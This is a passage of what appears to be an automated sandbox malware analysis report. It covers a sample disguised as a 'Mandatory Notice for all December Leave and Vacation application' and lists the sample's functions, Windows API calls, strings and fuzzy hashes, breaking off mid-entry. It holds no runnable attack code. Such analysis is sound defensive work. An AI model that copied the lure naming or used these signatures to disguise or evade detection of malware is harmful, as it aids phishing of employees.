                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __itow__swprintf_xtow@16
                                                      • String ID: %.15g$0x%p$False$True
                                                      • API String ID: 1502193981-2263619337
                                                      • Opcode ID: 2fb13ecb0ef483d23e73dd8bb6a9c1063f87806d1be202beef375787fbf16f59
                                                      • Instruction ID: 86e3f8e989f9c551f03ce29e74bc23cea34144bbbdd3faffd1f6beaae0a63ccb
                                                      • Opcode Fuzzy Hash: 2fb13ecb0ef483d23e73dd8bb6a9c1063f87806d1be202beef375787fbf16f59
                                                      • Instruction Fuzzy Hash: C44108729042099FEB24EF74DD41FBA73E8FF48310F24446EE18AD7191EA75A941EB50
                                                      Function 00FEA1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00FEA259
                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00FEA260
                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00FEA273
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00FEA27B
                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00FEA286
                                                      • DeleteDC.GDI32(00000000), ref: 00FEA28F
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00FEA299
                                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00FEA2AD
                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00FEA2B9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                      • String ID: static
                                                      • API String ID: 2559357485-2160076837
                                                      • Opcode ID: d95b354bce49c4256b57d6c62b041f71d60264b478ce3798a193a043f7c7499f
                                                      • Instruction ID: 24a376b36b3f023abc93f6ccb82c7afc6f2c575eb78938ca41c2ee38f5c15431
                                                      • Opcode Fuzzy Hash: d95b354bce49c4256b57d6c62b041f71d60264b478ce3798a193a043f7c7499f
                                                      • Instruction Fuzzy Hash: 9C318D31500115BBDF229FE5DC49FEA3B69FF0D360F100214FA59A6090CB3AE811EBA5
                                                      Function 00FC6F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                      • String ID: 0.0.0.0
                                                      • API String ID: 2620052-3771769585
                                                      • Opcode ID: ffebeef6de7c8db29beaeb4fd47720192d9600a0b15b374fd31ad84a62e08e9c
                                                      • Instruction ID: 3d8224cc346b87040b5fd5efd382cab0ca400c50ef12f294e49f542d951ca32b
                                                      • Opcode Fuzzy Hash: ffebeef6de7c8db29beaeb4fd47720192d9600a0b15b374fd31ad84a62e08e9c
                                                      • Instruction Fuzzy Hash: FC11EB72908116ABDB25ABA0AD4AFD977ACEF45710F04006DF049D6041FF79DA85E760
                                                      Function 00FA500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00FA5047
                                                        • Part of subcall function 00FA7C0E: __getptd_noexit.LIBCMT ref: 00FA7C0E
                                                      • __gmtime64_s.LIBCMT ref: 00FA50E0
                                                      • __gmtime64_s.LIBCMT ref: 00FA5116
                                                      • __gmtime64_s.LIBCMT ref: 00FA5133
                                                      • __allrem.LIBCMT ref: 00FA5189
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FA51A5
                                                      • __allrem.LIBCMT ref: 00FA51BC
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FA51DA
                                                      • __allrem.LIBCMT ref: 00FA51F1
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FA520F
                                                      • __invoke_watson.LIBCMT ref: 00FA5280
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                      • String ID:
                                                      • API String ID: 384356119-0
                                                      • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                      • Instruction ID: e01e29a9b1b0150bb0110b4f492b4e1f8e69111eb704ecf772826518cfaf2a5c
                                                      • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                      • Instruction Fuzzy Hash: 1171C6F2E00B17ABD7149E79CC91BAA73E8BF12B74F148229F510D6681E774D940ABD0
                                                      Function 00FC4DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00FC4DF8
                                                      • GetMenuItemInfoW.USER32(01041708,000000FF,00000000,00000030), ref: 00FC4E59
                                                      • SetMenuItemInfoW.USER32(01041708,00000004,00000000,00000030), ref: 00FC4E8F
                                                      • Sleep.KERNEL32(000001F4), ref: 00FC4EA1
                                                      • GetMenuItemCount.USER32(?), ref: 00FC4EE5
                                                      • GetMenuItemID.USER32(?,00000000), ref: 00FC4F01
                                                      • GetMenuItemID.USER32(?,-00000001), ref: 00FC4F2B
                                                      • GetMenuItemID.USER32(?,?), ref: 00FC4F70
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00FC4FB6
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FC4FCA
                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FC4FEB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                      • String ID:
                                                      • API String ID: 4176008265-0
                                                      • Opcode ID: 1fe4c7fb94e1ebac8a1ad166937ed199ddbdb34f5a39522e378d83512cea4397
                                                      • Instruction ID: f38672322d94d9058f6d088dd63a381640d136befc1ca98d81d95f3847c20a46
                                                      • Opcode Fuzzy Hash: 1fe4c7fb94e1ebac8a1ad166937ed199ddbdb34f5a39522e378d83512cea4397
                                                      • Instruction Fuzzy Hash: 0E61C1B1A0024AAFDB21CFA4DA95FAE7BB8FB41314F14015DF851A3285D776BD44EB20
                                                      Function 00FE9C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00FE9C98
                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00FE9C9B
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FE9CBF
                                                      • _memset.LIBCMT ref: 00FE9CD0
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FE9CE2
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00FE9D5A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$LongWindow_memset
                                                      • String ID:
                                                      • API String ID: 830647256-0
                                                      • Opcode ID: 16cf14196849a0b65ac1cd32e7ea6f2694317a0f8b3b0fe19867a16a2093577a
                                                      • Instruction ID: 6fd86347c761eef923aca911887e6f3de370c6f81e840a530d95d415e2875c6c
                                                      • Opcode Fuzzy Hash: 16cf14196849a0b65ac1cd32e7ea6f2694317a0f8b3b0fe19867a16a2093577a
                                                      • Instruction Fuzzy Hash: 7761BEB5900248AFDB20DFA8CC81EEE77B8EF09714F10015AFA54E7291C7B4AD41EB60
                                                      Function 00FB94E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00FB94FE
                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00FB9549
                                                      • VariantInit.OLEAUT32(?), ref: 00FB955B
                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00FB957B
                                                      • VariantCopy.OLEAUT32(?,?), ref: 00FB95BE
                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00FB95D2
                                                      • VariantClear.OLEAUT32(?), ref: 00FB95E7
                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00FB95F4
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FB95FD
                                                      • VariantClear.OLEAUT32(?), ref: 00FB960F
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FB961A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                      • String ID:
                                                      • API String ID: 2706829360-0
                                                      • Opcode ID: 06e380f7c0516fe20e051ab42ac356dc0c8f3b21ca1c23a00b2ca2b4994ca1d8
                                                      • Instruction ID: 9572e7330fc7de7dad37945edc95b180ea1030857b743d2675465d91482accd0
                                                      • Opcode Fuzzy Hash: 06e380f7c0516fe20e051ab42ac356dc0c8f3b21ca1c23a00b2ca2b4994ca1d8
                                                      • Instruction Fuzzy Hash: 33417E35D00219AFCB12EFE4D8849DEBBB9FF08354F018065E542A3251DB75EA45DFA0
                                                      Function 00FDADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F8936C: __swprintf.LIBCMT ref: 00F893AB
                                                        • Part of subcall function 00F8936C: __itow.LIBCMT ref: 00F893DF
                                                      • CoInitialize.OLE32 ref: 00FDADF6
                                                      • CoUninitialize.OLE32 ref: 00FDAE01
                                                      • CoCreateInstance.OLE32(?,00000000,00000017,0100D8FC,?), ref: 00FDAE61
                                                      • IIDFromString.OLE32(?,?), ref: 00FDAED4
                                                      • VariantInit.OLEAUT32(?), ref: 00FDAF6E
                                                      • VariantClear.OLEAUT32(?), ref: 00FDAFCF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                      • API String ID: 834269672-1287834457
                                                      • Opcode ID: aff9d0c6aece000eca584994f72e4f3c227da46a105d5b81aaa8e2d4d5f30ab6
                                                      • Instruction ID: 0307d523744ba1cb153eff7badd91866a09ca895253477fb3b51a8b1e81d6ef0
                                                      • Opcode Fuzzy Hash: aff9d0c6aece000eca584994f72e4f3c227da46a105d5b81aaa8e2d4d5f30ab6
                                                      • Instruction Fuzzy Hash: B861DC716083019FD711EF95C848B6AB7E9AF88710F08084EF9859B291C774EE44EB97
                                                      Function 00FD8107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00FD8168
                                                      • inet_addr.WSOCK32(?,?,?), ref: 00FD81AD
                                                      • gethostbyname.WSOCK32(?), ref: 00FD81B9
                                                      • IcmpCreateFile.IPHLPAPI ref: 00FD81C7
                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00FD8237
                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00FD824D
                                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00FD82C2
                                                      • WSACleanup.WSOCK32 ref: 00FD82C8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                      • String ID: Ping
                                                      • API String ID: 1028309954-2246546115
                                                      • Opcode ID: eacb5d0a4a749289a92324fb18c9039c4da3075f403bbfd38bce9cf8a293d84f
                                                      • Instruction ID: d0ff0d9572dabeb157d028cc5afa7e37759de404f22dad20346a75c7f548885f
                                                      • Opcode Fuzzy Hash: eacb5d0a4a749289a92324fb18c9039c4da3075f403bbfd38bce9cf8a293d84f
                                                      • Instruction Fuzzy Hash: A051A131604701AFD721EF64CC45B6AB7E5BF48360F08486AF99ADB390DB34E806EB51
                                                      Function 00FCE389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00FCE396
                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00FCE40C
                                                      • GetLastError.KERNEL32 ref: 00FCE416
                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00FCE483
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                      • API String ID: 4194297153-14809454
                                                      • Opcode ID: a3327d1404eb04f1943c1061d4944fbf28688875167b90a6917ba38fa1fb5ec0
                                                      • Instruction ID: 2151cff12c32199b68bfdc036ef430fdc7f7238aaa7ed8c1a8eedd676681a4c8
                                                      • Opcode Fuzzy Hash: a3327d1404eb04f1943c1061d4944fbf28688875167b90a6917ba38fa1fb5ec0
                                                      • Instruction Fuzzy Hash: A431923AA0020AAFDB15EBA4CE86FEDB7B8FF44310F14801DE505DB291DB759901EB91
                                                      Function 00FBB907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00FBB98C
                                                      • GetDlgCtrlID.USER32 ref: 00FBB997
                                                      • GetParent.USER32 ref: 00FBB9B3
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FBB9B6
                                                      • GetDlgCtrlID.USER32(?), ref: 00FBB9BF
                                                      • GetParent.USER32(?), ref: 00FBB9DB
                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00FBB9DE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CtrlParent
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 1383977212-1403004172
                                                      • Opcode ID: 17c246980ee3ec4141d71aacf6d771441266b193dc8372c894dc0539ba451805
                                                      • Instruction ID: 188f7f55104fa8e692b4f5fb9851ab98f6215d98e3a24626e46b7bfa723d76f9
                                                      • Opcode Fuzzy Hash: 17c246980ee3ec4141d71aacf6d771441266b193dc8372c894dc0539ba451805
                                                      • Instruction Fuzzy Hash: 6721A475900104AFDB05ABE5CC85EFEB7B5EF49310F100119F59197291DBB95815EF70
                                                      Function 00FBB9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00FBBA73
                                                      • GetDlgCtrlID.USER32 ref: 00FBBA7E
                                                      • GetParent.USER32 ref: 00FBBA9A
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FBBA9D
                                                      • GetDlgCtrlID.USER32(?), ref: 00FBBAA6
                                                      • GetParent.USER32(?), ref: 00FBBAC2
                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00FBBAC5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CtrlParent
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 1383977212-1403004172
                                                      • Opcode ID: 24bda4faf167dc1fcedbbe23315aa293549cb61ce88a4367ba86f9e06f5b002b
                                                      • Instruction ID: b7f95988d1ecc7973d34ce70562cc5ab4728b0dfdf6b25d8c59aecbc93f22c35
                                                      • Opcode Fuzzy Hash: 24bda4faf167dc1fcedbbe23315aa293549cb61ce88a4367ba86f9e06f5b002b
                                                      • Instruction Fuzzy Hash: F321D374A00104BFDB01ABA5CC85EFEBBB8EF48300F000015F99197191DBBD8815AF70
                                                      Function 00FBBAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetParent.USER32 ref: 00FBBAE3
                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00FBBAF8
                                                      • _wcscmp.LIBCMT ref: 00FBBB0A
                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00FBBB85
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameParentSend_wcscmp
                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                      • API String ID: 1704125052-3381328864
                                                      • Opcode ID: f54a944a61039e2a1248a5d444fef00baacdb1421269b1108aad33909dd02fdc
                                                      • Instruction ID: 36762ec523f414fd7f0df304074684e0407bd450d69678e5112d3f0066b9f34c
                                                      • Opcode Fuzzy Hash: f54a944a61039e2a1248a5d444fef00baacdb1421269b1108aad33909dd02fdc
                                                      • Instruction Fuzzy Hash: 0D110677A08707FFFA206622EC06DE6379CDB95734F204026F944E5099EFE6A8516A24
                                                      Function 00FDB2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00FDB2D5
                                                      • CoInitialize.OLE32(00000000), ref: 00FDB302
                                                      • CoUninitialize.OLE32 ref: 00FDB30C
                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00FDB40C
                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00FDB539
                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00FDB56D
                                                      • CoGetObject.OLE32(?,00000000,0100D91C,?), ref: 00FDB590
                                                      • SetErrorMode.KERNEL32(00000000), ref: 00FDB5A3
                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00FDB623
                                                      • VariantClear.OLEAUT32(0100D91C), ref: 00FDB633
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                      • String ID:
                                                      • API String ID: 2395222682-0
                                                      • Opcode ID: ef0bad3c9dd8b455e0cfb8d647b335cefa3a6a763590dd4b26e78587b083eebb
                                                      • Instruction ID: c9fa9a86e6de02daa7ac42a0cb1a40a94bf8749fcd62d735dfbd443c6e7e4d57
